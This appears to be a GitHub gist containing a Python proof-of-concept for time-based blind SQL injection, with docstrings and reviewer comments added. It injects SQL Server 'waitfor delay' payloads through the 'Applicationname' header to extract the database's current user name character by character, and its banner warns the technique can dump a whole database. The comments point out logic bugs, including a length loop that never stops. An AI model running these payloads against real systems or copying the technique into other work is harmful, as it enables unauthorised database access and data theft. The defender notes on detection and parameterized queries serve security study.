
@krnbhargav
Last active April 10, 2024 15:22
#!/usr/bin/env python3
from httpx import *
from sys import exit
import string
# One shared HTTP session is reused for every probe. The base URL, cookie,
# endpoint and JSON body are unfilled placeholders on the page.
client = Client(
    base_url='<url>',
    cookies={"<name1>": "<value1>"},
    follow_redirects=False,
)
api = '<endpoint>'
# Chained assignment: the same dict object is bound to both `temp_json` and
# `json` at module level.
temp_json = json = {"<field1>": "<field2>"}
def dumplength(l):
    """Report whether a timed probe suggests LEN(CURRENT_USER) equals ``l``.

    The probe string travels in the ``Applicationname`` request header of a
    POST to ``api``. The PoC presumably targets a server that concatenates
    that header into a SQL batch instead of binding it as a parameter
    (inferred from the probe text; the server code is not shown).

    Returns:
        True only when the response status is 200 and the request took at
        least five seconds. Any other outcome, including a raised exception
        (which is printed), returns False.

    Note:
        The verdict rests on latency alone, so a slow response for any
        unrelated reason is also counted as a match. For defenders, the
        observable signal is a header value containing ``waitfor delay``
        together with a response delayed by about five seconds; the
        server-side fix is a parameterized query for this header value.
    """
    probe = f"; if (LEN(CURRENT_USER) = {l}) waitfor delay '0:0:5' --"
    try:
        response = client.post(
            api,
            headers={'Applicationname': probe},
            json=temp_json,
        )
        if response.status_code != 200:
            print('[!] status code != 200')
        elif response.elapsed.total_seconds() >= 5:
            return True
    except Exception as e:
        print(e)
    return False
def dumpusername(i, c):
    """Report whether a timed probe suggests character ``i`` of CURRENT_USER is ``c``.

    ``i`` is the position passed to SQL ``SUBSTRING`` and ``c`` is the
    candidate character, interpolated into the probe between single quotes.
    The probe is sent in the ``Applicationname`` header of a POST to ``api``.

    Returns:
        True only when the response status is 200 and the request took at
        least five seconds. Any other outcome, including a raised exception
        (which is printed), returns False.

    Note:
        As with the length probe, the decision is purely latency-based, so
        unrelated slowness produces false matches. Server-side, the
        presumable root cause is a header value concatenated into SQL; a
        bound parameter removes it.
    """
    probe = f"; if (SUBSTRING((SELECT CURRENT_USER),{i},1) = '{c}') waitfor delay '0:0:5' --"
    try:
        response = client.post(
            api,
            headers={'Applicationname': probe},
            json=temp_json,
        )
        if response.status_code != 200:
            print('[!] status code != 200')
        elif response.elapsed.total_seconds() >= 5:
            return True
    except Exception as e:
        print(e)
    return False
# Script entry point: first probes for the length of CURRENT_USER, then
# probes each character position against a fixed alphabet.
# NOTE(review): the page lost all indentation; the nesting below is
# reconstructed from the statements and should be confirmed against the
# original gist.
if __name__ == '__main__':
    print("""[!] This script is only for POC purpose,\nThere is no limit to what attacker can do\nWorst case scenerio is dumping whole database.""")
    print("[*] Finding the length of current user of database")
    l = 0
    i = 0
    # Length phase: try candidate lengths 0, 1, 2, ... one request at a time.
    # As written there is no exit on a match; the loop keeps re-probing the
    # same value and only ends when the operator presses Ctrl-C.
    while True:
        try:
            if(dumplength(i)):
                l = i
                print(f'[+] Found length of CURRENT_USER : {l}')
            else:
                i+=1
        except KeyboardInterrupt as e:
            break
    # Character phase: SQL SUBSTRING positions start at 1.
    i = 1
    result = ""
    # Candidate alphabet: "-", "_", ".", space, ASCII letters and digits.
    # Characters outside this set are never tested.
    character_to_bruteforce ="-_. " + string.ascii_letters + string.digits
    if (l != 0):
        print("[*] Dumping username")
        while (i<=l):
            try:
                for c in character_to_bruteforce:
                    if(dumpusername(i,c)):
                        result+=c
                        i+=1
                        print(f'[*] Found : {result}')
                        # `continue` applies to the inner `for`, so the scan
                        # moves on to the next candidate character with the
                        # already-incremented position instead of restarting
                        # the alphabet.
                        continue
            except KeyboardInterrupt as e:
                client.close()
                break
        client.close()
    else:
        # No length was recorded: release the HTTP session and stop.
        client.close()
        exit(0)